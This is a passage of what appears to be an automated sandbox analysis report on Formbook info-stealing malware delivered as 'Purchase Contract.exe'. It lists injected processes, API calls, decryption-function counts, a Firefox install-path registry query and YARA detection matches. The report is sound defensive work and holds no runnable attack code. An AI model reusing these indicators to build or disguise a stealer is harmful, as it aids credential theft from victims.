Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36C70 NtReadFile,14_2_00C36C70
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36DA0 NtAllocateVirtualMemory,14_2_00C36DA0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36CEA NtClose,14_2_00C36CEA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36C6A NtReadFile,14_2_00C36C6A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36D9C NtAllocateVirtualMemory,14_2_00C36D9C
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E01DE30_2_05E01DE3
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E1D5D20_2_05E1D5D2
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E0FDDB0_2_05E0FDDB
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05DFE58A0_2_05DFE58A
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E1E5810_2_05E1E581
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D50D400_2_05D50D40
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05DFC53F0_2_05DFC53F
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D715300_2_05D71530
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E11D1B0_2_05E11D1B
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E225190_2_05E22519
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E144EF0_2_05E144EF
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E1DCC50_2_05E1DCC5
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E134900_2_05E13490
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E22C9A0_2_05E22C9A
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E21C9F0_2_05E21C9F
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D8547E0_2_05D8547E
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D714100_2_05D71410
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E0F42B0_2_05E0F42B
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D6740C0_2_05D6740C
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D567D00_2_05D567D0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E21FCE0_2_05E21FCE
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D757900_2_05D75790
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E127820_2_05E12782
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E217460_2_05E21746
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E226F80_2_05E226F8
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E13E960_2_05E13E96
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E1CE660_2_05E1CE66
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D776400_2_05D77640
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D85E700_2_05D85E70
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D84E610_2_05D84E61
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D866110_2_05D86611
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E219E20_2_05E219E2
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E161DF0_2_05E161DF
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D861800_2_05D86180
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E2D9BE0_2_05E2D9BE
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D8594B0_2_05D8594B
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D791100_2_05D79110
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D871100_2_05D87110
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05DA99060_2_05DA9906
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E228E80_2_05E228E8
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D848CB0_2_05D848CB
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D6A0800_2_05D6A080
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E018B60_2_05E018B6
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D810700_2_05D81070
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D898100_2_05D89810
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E1D0160_2_05E1D016
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D8E0200_2_05D8E020
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D800210_2_05D80021
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D863C20_2_05D863C2
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D5EBE00_2_05D5EBE0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D84B960_2_05D84B96
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D7FB400_2_05D7FB40
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D78B000_2_05D78B00
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E222DD0_2_05E222DD
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D742B00_2_05D742B0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E21A990_2_05E21A99
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D84A5B0_2_05D84A5B
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E10A020_2_05E10A02
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D8523D0_2_05D8523D
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05E2E2140_2_05E2E214
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_010A1C880_2_010A1C88
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_010A0BC90_2_010A0BC9
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_010A06400_2_010A0640
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_010A1D3A0_2_010A1D3A
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E547E3_2_044E547E
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044C740C3_2_044C740C
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D14103_2_044D1410
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0456F42B3_2_0456F42B
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0457DCC53_2_0457DCC5
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045744EF3_2_045744EF
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04582C9A3_2_04582C9A
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04581C9F3_2_04581C9F
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045734903_2_04573490
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044B0D403_2_044B0D40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045825193_2_04582519
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04571D1B3_2_04571D1B
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0455C53F3_2_0455C53F
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D15303_2_044D1530
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0457D5D23_2_0457D5D2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0456FDDB3_2_0456FDDB
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04561DE33_2_04561DE3
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0457E5813_2_0457E581
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0455E58A3_2_0455E58A
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D76403_2_044D7640
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E4E613_2_044E4E61
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0457CE663_2_0457CE66
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E5E703_2_044E5E70
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E66113_2_044E6611
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045826F83_2_045826F8
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04573E963_2_04573E96
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D87403_2_044D8740
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045817463_2_04581746
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04581FCE3_2_04581FCE
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044B67D03_2_044B67D0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045727823_2_04572782
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D57903_2_044D5790
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0453A8603_2_0453A860
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E10703_2_044E1070
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0457D0163_2_0457D016
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E98103_2_044E9810
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044EE0203_2_044EE020
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E00213_2_044E0021
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E48CB3_2_044E48CB
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045828E83_2_045828E8
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044CA0803_2_044CA080
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045618B63_2_045618B6
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E594B3_2_044E594B
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045099063_2_04509906
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D91103_2_044D9110
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E71103_2_044E7110
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045761DF3_2_045761DF
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D81E03_2_044D81E0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045819E23_2_045819E2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E61803_2_044E6180
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0458D9BE3_2_0458D9BE
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E4A5B3_2_044E4A5B
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0458E2143_2_0458E214
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04570A023_2_04570A02
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E523D3_2_044E523D
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_045822DD3_2_045822DD
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_04581A993_2_04581A99
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D42B03_2_044D42B0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044DFB403_2_044DFB40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044D8B003_2_044D8B00
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E63C23_2_044E63C2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044BEBE03_2_044BEBE0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044E4B963_2_044E4B96
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0297AAE23_2_0297AAE2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029678F03_2_029678F0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029678EB3_2_029678EB
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621661113_2_06216611
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06214E6113_2_06214E61
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062ACE6613_2_062ACE66
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06215E7013_2_06215E70
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620764013_2_06207640
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A3E9613_2_062A3E96
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B26F813_2_062B26F8
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620874013_2_06208740
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B174613_2_062B1746
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A278213_2_062A2782
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620579013_2_06205790
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_061E67D013_2_061E67D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B1FCE13_2_062B1FCE
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0629F42B13_2_0629F42B
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_061F740C13_2_061F740C
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620141013_2_06201410
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621547E13_2_0621547E
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B2C9A13_2_062B2C9A
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B1C9F13_2_062B1C9F
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A349013_2_062A3490
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A44EF13_2_062A44EF
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062ADCC513_2_062ADCC5
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620153013_2_06201530
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0628C53F13_2_0628C53F
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A1D1B13_2_062A1D1B
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B251913_2_062B2519
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_061E0D4013_2_061E0D40
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0628E58A13_2_0628E58A
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062AE58113_2_062AE581
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06291DE313_2_06291DE3
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0629FDDB13_2_0629FDDB
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062AD5D213_2_062AD5D2
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621523D13_2_0621523D
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A0A0213_2_062A0A02
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062BE21413_2_062BE214
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06214A5B13_2_06214A5B
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062042B013_2_062042B0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B1A9913_2_062B1A99
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B22DD13_2_062B22DD
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06208B0013_2_06208B00
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620FB4013_2_0620FB40
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_06214B9613_2_06214B96
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062163C213_2_062163C2
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_061EEBE013_2_061EEBE0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621002113_2_06210021
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621E02013_2_0621E020
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621981013_2_06219810
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062AD01613_2_062AD016
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0626A86013_2_0626A860
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621107013_2_06211070
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_061FA08013_2_061FA080
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062918B613_2_062918B6
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B28E813_2_062B28E8
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062148CB13_2_062148CB
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0623990613_2_06239906
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0620911013_2_06209110
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621711013_2_06217110
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621594B13_2_0621594B
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062BD9BE13_2_062BD9BE
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0621618013_2_06216180
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062081E013_2_062081E0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062B19E213_2_062B19E2
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_062A61DF13_2_062A61DF
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_03020BC913_2_03020BC9
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0302064013_2_03020640
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_03021C8813_2_03021C88
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_03021D3A13_2_03021D3A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E944EF14_2_04E944EF
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9DCC514_2_04E9DCC5
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA2C9A14_2_04EA2C9A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA1C9F14_2_04EA1C9F
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9349014_2_04E93490
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0547E14_2_04E0547E
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E8F42B14_2_04E8F42B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF141014_2_04DF1410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DE740C14_2_04DE740C
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E81DE314_2_04E81DE3
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E8FDDB14_2_04E8FDDB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9D5D214_2_04E9D5D2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9E58114_2_04E9E581
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E7E58A14_2_04E7E58A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DD0D4014_2_04DD0D40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E7C53F14_2_04E7C53F
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF153014_2_04DF1530
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E91D1B14_2_04E91D1B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA251914_2_04EA2519
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA26F814_2_04EA26F8
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E93E9614_2_04E93E96
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E04E6114_2_04E04E61
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9CE6614_2_04E9CE66
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E05E7014_2_04E05E70
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF764014_2_04DF7640
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0661114_2_04E06611
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DD67D014_2_04DD67D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA1FCE14_2_04EA1FCE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF579014_2_04DF5790
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9278214_2_04E92782
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF874014_2_04DF8740
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA174614_2_04EA1746
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA28E814_2_04EA28E8
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E048CB14_2_04E048CB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DEA08014_2_04DEA080
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E818B614_2_04E818B6
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E5A86014_2_04E5A860
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0107014_2_04E01070
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0E02014_2_04E0E020
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0002114_2_04E00021
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0981014_2_04E09810
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9D01614_2_04E9D016
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA19E214_2_04EA19E2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E961DF14_2_04E961DF
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF81E014_2_04DF81E0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EAD9BE14_2_04EAD9BE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0618014_2_04E06180
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0594B14_2_04E0594B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF911014_2_04DF9110
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E2990614_2_04E29906
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0711014_2_04E07110
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA22DD14_2_04EA22DD
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF42B014_2_04DF42B0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA1A9914_2_04EA1A99
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E04A5B14_2_04E04A5B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0523D14_2_04E0523D
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E90A0214_2_04E90A02
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EAE21414_2_04EAE214
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E063C214_2_04E063C2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DDEBE014_2_04DDEBE0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E04B9614_2_04E04B96
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DFFB4014_2_04DFFB40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF8B0014_2_04DF8B00
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C278EB14_2_00C278EB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C278F014_2_00C278F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C3AAE214_2_00C3AAE2
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: String function: 0623DDE8 appears 50 times
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: String function: 061EB0E0 appears 176 times
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: String function: 06275110 appears 78 times
Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0450DDE8 appears 50 times
Source: C:\Windows\SysWOW64\control.exeCode function: String function: 044BB0E0 appears 176 times
Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04545110 appears 78 times
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: String function: 05DE5110 appears 50 times
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: String function: 05D5B0E0 appears 176 times
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: String function: 05DADDE8 appears 50 times
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04E65110 appears 78 times
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04E2DDE8 appears 50 times
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04DDB0E0 appears 176 times
Sample file is different than original file name gathered from version infoShow sources
Source: Purchase Contract.exe, 00000000.00000002.821337419.0000000005FDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000000.765245970.0000000000AAA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepjzKElRfvzoP.exe4 vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000003.807640474.000000000125C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.812742881.0000000005280000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Contract.exe
Source: Purchase Contract.exeBinary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\control.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
